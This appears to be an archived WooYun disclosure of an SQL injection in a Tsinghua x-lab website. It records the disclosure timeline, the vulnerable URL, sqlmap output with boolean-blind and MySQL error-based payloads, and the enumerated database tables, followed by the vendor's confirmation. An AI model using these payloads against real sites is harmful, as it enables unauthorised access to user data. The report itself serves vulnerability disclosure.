WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
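2015-11-27: Details reported to the vendor; awaiting vendor handling
2015-11-27: Vendor confirmed; details disclosed to the vendor only
2015-12-07: Details disclosed to core white hats and experts in related fields
2015-12-17: Details disclosed to regular white hats
2015-12-27: Details disclosed to trainee white hats
2016-01-11: Details disclosed to the public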
http://www.x-lab.tsinghua.edu.cn/?a=projectshow&c=nurture&id=229
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: a=projectshow&c=nurture&id=229 AND 8585=8585

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: a=projectshow&c=nurture&id=229 AND (SELECT 4122 FROM(SELECT COUNT(*),CONCAT(0x716b6b6271,(SELECT (ELT(4122=4122,1))),0x7178717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
web application technology: Apache
back-end DBMS: MySQL 5.0
Database: x-lab
+----------------------------+---------+
| Table                      | Entries |
+----------------------------+---------+
| zcn_partner                | 7654    |
| zcn_users_log              | 6164    |
| zcn_cirf                   | 4364    |
| zcn_bm                     | 3529    |
| zcn_mailinglist            | 2420    |
| zcn_eir_time               | 2248    |
| zcn_members                | 1612    | // users
| zcn_project                | 892     |
| zcn_bangzu                 | 775     |
| zcn_eir_yy                 | 329     |
| zcn_place                  | 274     |
| zcn_stat_active            | 264     |
| zcn_project_receive        | 257     |
| zcn_project_cup            | 254     |
| zcn_companies_registry     | 214     |
| zcn_voice                  | 213     |
| zcn_cirf_class             | 194     |
| zcn_newslettercon          | 167     |
| zcn_zt                     | 164     |
| zcn_eir_addtime            | 155     |
| zcn_project_excellent      | 137     |
| zcn_top10                  | 133     |
| zcn_type_list              | 121     |
| zcn_message                | 119     |
| zcn_train                  | 116     |
| zcn_eir                    | 101     |
| zcn_zwxx                   | 48      |
| zcn_zhaomu                 | 44      |
| zcn_links                  | 38      |
| zcn_hr                     | 37      |
| zcn_menus                  | 36      |
| zcn_type_class             | 35      |
| zcn_slider                 | 29      |
| zcn_president_cup_activity | 27      |
| zcn_project_assess         | 23      |
| zcn_users                  | 20      |
| zcn_video                  | 20      |
| zcn_zwxx_class             | 20      |
| zcn_newsletter             | 18      |
| zcn_president_cup          | 17      |
| zcn_advice                 | 14      |
| zcn_articles               | 13      |
| zcn_mail_template          | 12      |
| zcn_email_queue            | 10      |
| zcn_fuwu                   | 10      |
| zcn_kcxx                   | 9       |
| zcn_project_class          | 9       |
| zcn_cm_cd                  | 8       |
| zcn_gzf                    | 5       |
| zcn_users_class            | 5       |
| zcn_video_class            | 5       |
| zcn_kcxx_class             | 4       |
| zcn_links_class            | 4       |
| zcn_xmxx                   | 4       |
| zcn_about                  | 3       |
| zcn_adflash                | 3       |
| zcn_articles_class         | 3       |
| zcn_cm_grp_cd              | 3       |
| zcn_project_story          | 3       |
| zcn_member_video_comment   | 1       |
| zcn_network                | 1       |
+----------------------------+---------+
Severity: High
Vulnerability Rank: 16
Confirmed: 2015-11-27 15:04
Thank you for the reminder; we will fix this as soon as possible.
None yet